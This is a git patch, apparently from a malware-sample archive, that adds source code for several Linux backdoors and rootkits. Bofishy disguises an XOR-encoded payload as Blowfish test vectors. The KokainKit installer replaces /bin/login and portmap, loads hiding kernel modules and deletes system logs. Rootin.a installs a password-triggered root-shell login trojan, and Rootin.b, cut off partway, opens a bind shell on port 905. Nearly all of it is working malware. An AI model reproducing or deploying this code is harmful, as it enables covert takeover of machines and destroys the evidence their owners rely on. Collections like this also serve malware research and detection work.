From b3ade600b35fc1003bfbe8f41d33d760217f58b7 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 10 Oct 2020 22:00:44 -0500 Subject: [PATCH] Add files via upload --- Linux/Backdoor.Linux.Bofishy.a | 251 +++++++ Linux/Backdoor.Linux.Kokain | 174 +++++ Linux/Backdoor.Linux.Rootin.a | 85 +++ Linux/Backdoor.Linux.Rootin.b | 74 ++ Linux/Backdoor.Linux.ShadyShell.c | 22 + Linux/Backdoor.Unix.Galore.11 | 141 ++++ Linux/Constructor.Script.IBBM.a | 1034 +++++++++++++++++++++++++++ Linux/Virus.BAS.Xyc | 13 + Linux/Virus.Linux.TrojoDaemon.c | 96 +++ Linux/Virus.Script.Higu | 13 + Linux/Virus.Script.IBM.XMasTreeWorm | 102 +++ Linux/Virus.Script.MBP.Kynel | Bin 0 -> 7512 bytes 12 files changed, 2005 insertions(+) create mode 100644 Linux/Backdoor.Linux.Bofishy.a create mode 100644 Linux/Backdoor.Linux.Kokain create mode 100644 Linux/Backdoor.Linux.Rootin.a create mode 100644 Linux/Backdoor.Linux.Rootin.b create mode 100644 Linux/Backdoor.Linux.ShadyShell.c create mode 100644 Linux/Backdoor.Unix.Galore.11 create mode 100644 Linux/Constructor.Script.IBBM.a create mode 100644 Linux/Virus.BAS.Xyc create mode 100644 Linux/Virus.Linux.TrojoDaemon.c create mode 100644 Linux/Virus.Script.Higu create mode 100644 Linux/Virus.Script.IBM.XMasTreeWorm create mode 100644 Linux/Virus.Script.MBP.Kynel diff --git a/Linux/Backdoor.Linux.Bofishy.a b/Linux/Backdoor.Linux.Bofishy.a new file mode 100644 index 00000000..8dd0c87f --- /dev/null +++ b/Linux/Backdoor.Linux.Bofishy.a @@ -0,0 +1,251 @@ +/* + * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems. + * Perform routine compatability checks. + */ +#include + +#define KEY_TEST_NUM 25 +static unsigned char key_test[KEY_TEST_NUM]={ + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87, + 0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f, + 0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77, + 0x88}; + +/* DES cbc input vectors */ +static unsigned char ecb_data[]={ + + 0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c, + 0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c, + 0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60, + 0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25, + 0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c, + 0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11, + 0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b, + 0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41, + 0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c, + 0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c, + 0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01, + 0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b, + 0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47, + 0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f, + 0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c, + 0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12, + 0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57, + 0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73, + 0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40, + 0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f, + 0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07, + 0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19, + 0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f, + 0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41, + 0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41, + 0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03, + 0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70, + 0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e, + 0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14, + 0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a, + 0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e, + 0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14, + 0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b, + 0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e, + 0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e, + 0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46, + 0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e, + 0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40, + 0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59, + 0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c, + 0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e, + 0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06, + 0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a, + 0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03, + 0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06, + 0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42, + 0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d, + 0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19, + 0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e, + 0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12, + 0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d, + 0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01, + 0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07, + 0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41, + 0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a, + 0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d, + 0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40, + 0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e, + 0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46, + 0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c, + 0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02, + 0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06, + 0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57, + 0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e, + 0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c, + 0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e, + 0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07, + 0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c, + 0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03, + 0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59, + 0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63, + 0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74, + 0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14, + 0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f, + 0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f, + 0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d, + 0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b, + 0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43, + 0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a, + 0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59, + 0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b, + 0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46, + 0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14, + 0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62, + 0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f, + 0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40, + 0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f, + 0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49, + 0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49, + 0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02, + 0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f, + 0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d, + 0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a, + 0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c, + 0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46, + 0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d, + 0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25, + 0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49, + 0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b, + 0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68, + 0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a, + 0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c, + 0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c, + 0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09, + 0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c, + 0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a, + 0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44, + 0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14, + 0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e, + 0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60, + 0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b, + 0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f, + 0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25, + 0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b, + 0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41, + 0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f, + 0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f, + 0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b, + 0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00, + 0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11, + 0x09,0x1e,0x25,0x00}; + +/* big endian */ +static unsigned long bfplain[2][2]={ + {0x424c4f57L,0x46495348L}, + {0xfedcba98L,0x76543210L} + }; + +static unsigned long bfcipher[2][2]={ + {0x324ed0feL,0xf413a203L}, + {0xcc91732bL,0x8022f684L} + }; + + +static unsigned char ocb_data[]={ + 0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b, + 0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20, + 0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28, + 0x00}; + +static unsigned char cbc_key [16]={ + 0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef, + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87}; + +static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10}; + +#if defined(WIN16) || defined(__LP32__) +#elif defined(_CRAY) || defined(__ILP64__) +/* + * _CRAY note. I could declare short, but I have no idea what impact + * does it have on performance on none-T3E machines. I could declare + * int, but at least on C90 sizeof(int) can be chosen at compile time. + * So I've chosen long... + * + */ +#else +#endif + +main(void) +{ + int i, n, err; + unsigned char cbc_in[40],cbc_out[40],iv[8]; + + dup2(1, 2); +#ifdef CHARSET_EPCDIC + epcdic2ascii(ecb_data, strlen(ecb_data)); +#endif + + printf("# testing in raw ecb mode\n"); + + n=0; + if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (err) + { + for (i = 0; i < sizeof(ecb_data)-1; i++) + fprintf(stderr, "%c", ecb_data[i] ^ 47); + } +return(0); +} diff --git a/Linux/Backdoor.Linux.Kokain b/Linux/Backdoor.Linux.Kokain new file mode 100644 index 00000000..d69e5ab8 --- /dev/null +++ b/Linux/Backdoor.Linux.Kokain @@ -0,0 +1,174 @@ +#!/bin/sh + +# KokainKit v1.6 by deka +# - +# A rootkit based on knark and cobolt. +# Do not Distribute! +# - + +TORNDIR=/usr/src/.puta +THEPASS=$1 +DITTPORT=$2 +THEDIR=/usr/lib/$THEPASS + +echo "---------------------------------------" +echo " KokainKit v1.6 by dekah&self" +echo "---------------------------------------" +echo "" +echo "Using magic word $THEPASS and dittrichport $DITTPORT." +echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)" + +if ! test "$(whoami)" = "root"; then + echo " - UID0 check failed" + echo "" + sleep 3 + echo "FATAL: You're not root" + exit 1 +fi + +if test -d "$TORNDIR"; then + echo " - T0rnKit found. Screwing it up" + killall -9 in.inetd + killall -9 t0rntd + echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash + echo "" > /usr/sbin/in.inetd + echo "ap" > $TORNDIR/.1file + echo "255.255" > $TORNDIR/.1addr + echo "255.255" > $TORNDIR/.1logz + echo "ap" > $TORNDIR/.1proc +fi + +if ! test -d "/usr/include"; then + echo " - /usr/include does not exist, making it (ugly)..." + mkdir /usr/include +fi + +if ! test -d "/usr/include/pwdb"; then + echo " - /usr/include/pwdb does not exist, making it (ugly)..." + mkdir /usr/include/pwdb +fi + +mkdir $THEDIR +if test -d "$THEDIR"; then + echo " - Secret dir created" +else + echo " - MkDir failed" + echo "" + echo "FATAL: Unable to create the secret directory" + exit 1 +fi + +cd src +echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h +echo "#define MAGIC_DIR \"$THEDIR\"" >> kokain.h + +gcc -O2 cobolt.c -o cobolt +if test -r "./cobolt"; then + echo " - Cobolt compiled" +else + echo " - gcc failed" + echo "" + cd .. + sleep 3 + echo "FATAL: Unable to compile Cobolt" + exit 1 +fi +touch -acmr /bin/login cobolt +cp /bin/login $THEDIR/login1 +cp cobolt $THEDIR/login2 +echo " - Cobolt installed" + +gcc -O2 autoexec.c -o autoexec +if test -r "./autoexec"; then + echo " - AutoExec compiled" +else + echo " - gcc failed" + echo "" + cd .. + echo "FATAL: Unable to compile AutoExec" + exit 1 +fi + +touch -acmr /sbin/portmap autoexec +cp /sbin/portmap $THEDIR/portmap +rm -f /sbin/portmap +cp autoexec /sbin/portmap +echo "#!/bin/sh" > $THEDIR/autoexec +echo " - AutoExec installed" +cd .. + +killall -9 syslogd klogd +./wipe u root >/dev/null 2>&1 +rm -f /var/log/messages /var/log/secure +cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1 +cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1 +cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1 +cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1 +echo " - Logs cleaned" + +#echo "" > /etc/hosts.allow +#echo "" > /etc/hosts.deny +#echo " - Hosts.deny/Hosts.allow cleaned" +echo " - Patching dittrich..." +./bpatch ./dittrich __PATCHPort__ $DITTPORT + +cat <> $THEDIR/.bashrc +alias ls="ls --color -alF" +alias dir="dir --color" +export PS1="\u@\h:\w# " +export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff +cd +E0F +echo " - .bashrc created" + +cp -R dittrich stuff $THEDIR +echo " - Stuff installed" + +mkdir $THEDIR/knrk +cd knark +make >/dev/null 2>&1 +echo " - Knark compiled" +cd .. +rm -rf knark/knrksrc knark/Makefile +cp -R knark/* $THEDIR/knrk +echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec +echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec +echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec +echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec +echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec +echo "$THEDIR/dittrich" >> $THEDIR/autoexec +echo "killall -31 dittrich" >> $THEDIR/autoexec + +/sbin/portmap >/dev/null 2>&1 +echo " - Knark installed" + +if test -d "/var/named/ADMROCKS"; then + rm -rf /var/named/ADMROCKS + echo " - AdmRocks erased" +fi + +cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah +rm -f /etc/inetd.conf +cp /tmp/blahah /etc/inetd.conf +rm -f /tmp/blahah +echo " - Inetd.conf fixed" + +PATH=/sbin:$PATH +syslogd +klogd +echo " - Syslogd/Klogd restarted" +cd .. +rm -rf *kokain* +echo " - KokainKit removed" + +echo "" +#echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--" +if test -d "/proc/$THEPASS"; +then + echo "Knark installed successfully." +else + echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD" + cp $THEDIR/login2 /bin/login +fi +echo "kitinst $THEPASS $DITTPORT" +# - EoF - # diff --git a/Linux/Backdoor.Linux.Rootin.a b/Linux/Backdoor.Linux.Rootin.a new file mode 100644 index 00000000..2b2f2f6b --- /dev/null +++ b/Linux/Backdoor.Linux.Rootin.a @@ -0,0 +1,85 @@ +#!/bin/sh + +# Fearless Rootkit T-Type v0.1 +# Coded by Merlion merld_one@yahoo.com +# To run: +# chmod 755 droprk.sh +# ./droprk.sh +# Telnet to login daemon (port 513) and enter password +# Have fun! + +arg="$1" +if [ "$arg" = "" ]; then +echo "Usage is: ./droprk -i (to install) -r (to uninstall)" +exit 1 +elif [ "$arg" = "-r" ]; then +test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed" +elif [ $arg = "-i" ]; then + +cat > /tmp/drop.c << EOF + +#include +#include +#include +#include +#include /* For daemon related functions */ + +#define REAL "/bin/.login" +#define TROJAN "/bin/login" +#define ROOT "merlion" + +char **execute; +char passwd[8]; + +main(int argc, char **argv) { + +void die(char *error); +void connection(); + +pid_t pid, sid; /* Daemon variables */ + +signal(SIGALRM,connection); +alarm(1); +execute=argv; +*execute=TROJAN; + +if ((pid=fork()) < 0) die("Error on fork()"); /* Start daemon process */ +if (pid > 0) exit(0); /* Exit parent process */ +if ((sid=setsid()) < 0) die("Error on setsid()"); /* Create new session */ +if ((chdir("/") < 0)) die("Error on chdir()"); /* Set working directory */ +umask(0); /* Set umask to 0 to avoid unwanted rights inheritance */ +close(STDIN_FILENO); /* Close */ +close(STDOUT_FILENO); /* associated */ +close(STDERR_FILENO); /* file streams */ +/* On our own now */ + +scanf("%s", passwd); +if (strcmp(passwd,ROOT) == 0) { +alarm(0); +execl("/bin/sh","/bin/sh","-i",0); +exit(0); } /* Remove?? */ +else { +execv(REAL,execute); +exit(0); } /* Remove?? */ +} + +void connection() { +execv(REAL,execute); +exit(0); } + +void die(char *error) { +perror(error); +exit(1); } + +EOF + +fi + +gcc -o /tmp/login /tmp/drop.c +rm -f /tmp/drop.c +mv /bin/login /bin/.login +mv /tmp/login /bin/ + +exit 0 + + diff --git a/Linux/Backdoor.Linux.Rootin.b b/Linux/Backdoor.Linux.Rootin.b new file mode 100644 index 00000000..2c6158de --- /dev/null +++ b/Linux/Backdoor.Linux.Rootin.b @@ -0,0 +1,74 @@ +#!/bin/sh + +# Fearless Rootkit D-Type v0.1 +# Coded by Merlion +# Website: http://areyoufearless.com + +# chmod 755 rootd.sh +# ./rootd.sh +# telnet to port 905 & run commands. End each command with a semicolon (;) + + + + + +#include +#include +#include +#include +#include +#include +#include + +void die(char *error); +main(int argc, char **argv) { +pid_t pid, sid; +int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen; +unsigned short int mcon; +unsigned short int port; +char *rbuf, *rmode; +struct sockaddr_in Client, Server; +if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket"); +if (argc != 3) die("Usage"); +memset(&Server, 0, sizeof(Server)); +Server.sin_family=AF_INET; +port=905; +mcon=5; +Server.sin_port=htons(port); +Server.sin_addr.s_addr=htonl(INADDR_ANY); +if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0) +die("No socket options set"); +if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0) +die("Could not bind socket"); +if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()"); +pid=fork(); +if (pid < 0) die("Initial fork() failed"); 